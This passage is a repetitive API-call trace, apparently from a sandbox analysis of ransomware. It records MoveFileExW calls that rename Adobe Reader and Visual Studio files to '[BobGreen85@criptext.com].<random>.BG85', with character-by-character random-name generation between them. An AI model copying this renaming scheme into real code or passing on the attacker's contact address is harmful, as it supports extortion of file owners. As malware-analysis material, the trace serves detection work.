lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\[BobGreen85@criptext.com].A0TTjMmu-4Us3R03z.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\[bobgreen85@criptext.com].a0ttjmmu-4us3r03z.bg85"), dwFlags=0x1) returned 1 [0075.787] GetTickCount () returned 0x114b3e5 [0075.787] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19612854927) returned 1 [0075.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0075.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0075.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0075.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0075.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0075.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0075.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0075.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0075.790] GetTickCount () returned 0x114b3e5 [0075.791] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19612953660) returned 1 [0075.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0075.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0075.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0075.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0075.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0075.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0075.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0075.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0075.791] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\[BobGreen85@criptext.com].gQUDhEEw-VonWW9Om.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\[bobgreen85@criptext.com].gqudheew-vonww9om.bg85"), dwFlags=0x1) returned 1 [0075.793] GetTickCount () returned 0x114b3e5 [0075.793] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19613189971) returned 1 [0075.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0075.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0075.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0075.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0075.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0075.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0075.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0075.793] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0075.793] GetTickCount () returned 0x114b3e5 [0075.793] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19613243319) returned 1 [0075.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0075.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0075.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0075.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0075.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0075.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0075.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0075.794] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0075.794] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\defaultid.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\[BobGreen85@criptext.com].WzlYXlDc-GWvAojKX.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\[bobgreen85@criptext.com].wzlyxldc-gwvaojkx.bg85"), dwFlags=0x1) returned 1 [0075.795] GetTickCount () returned 0x114b3e5 [0075.795] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19613426291) returned 1 [0075.795] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0075.795] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0075.796] GetTickCount () returned 0x114b3e5 [0075.796] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19613495299) returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0075.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0075.797] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0075.797] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0075.797] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0075.797] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\[BobGreen85@criptext.com].P4IJjywu-RIdrVU49.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\[bobgreen85@criptext.com].p4ijjywu-ridrvu49.bg85"), dwFlags=0x1) returned 1 [0075.798] GetTickCount () returned 0x114b3e5 [0076.253] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19659213917) returned 1 [0076.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0076.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0076.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0076.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0076.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0076.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0076.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0076.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0076.254] GetTickCount () returned 0x114b5b9 [0076.254] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19659321254) returned 1 [0076.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0076.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0076.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0076.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0076.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0076.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0076.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0076.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0076.255] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\[BobGreen85@criptext.com].TS0RezyF-r52svTfn.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\[bobgreen85@criptext.com].ts0rezyf-r52svtfn.bg85"), dwFlags=0x1) returned 1 [0076.257] GetTickCount () returned 0x114b5b9 [0076.257] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19659571718) returned 1 [0076.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0076.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0076.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0076.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0076.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0076.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0076.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0076.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0076.258] GetTickCount () returned 0x114b5b9 [0076.258] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19659682120) returned 1 [0076.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0076.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0076.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0076.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0076.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0076.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0076.259] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0076.259] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0076.259] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\[BobGreen85@criptext.com].mDCFBYYQ-OPm5lXOg.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\[bobgreen85@criptext.com].mdcfbyyq-opm5lxog.bg85"), dwFlags=0x1) returned 1 [0076.260] GetTickCount () returned 0x114b5b9 [0076.260] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19659888361) returned 1 [0076.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0076.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0076.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0076.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0076.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0076.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0076.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0076.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0076.261] GetTickCount () returned 0x114b5b9 [0076.261] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19660001520) returned 1 [0076.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0076.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0076.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0076.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0076.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0076.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0076.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0076.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0076.262] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\standard.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\[BobGreen85@criptext.com].SUvZn6vj-1QWFbiSW.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\[bobgreen85@criptext.com].suvzn6vj-1qwfbisw.bg85"), dwFlags=0x1) returned 1 [0076.263] GetTickCount () returned 0x114b5b9 [0076.263] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19660234941) returned 1 [0076.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0076.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0076.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0076.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0076.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0076.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, 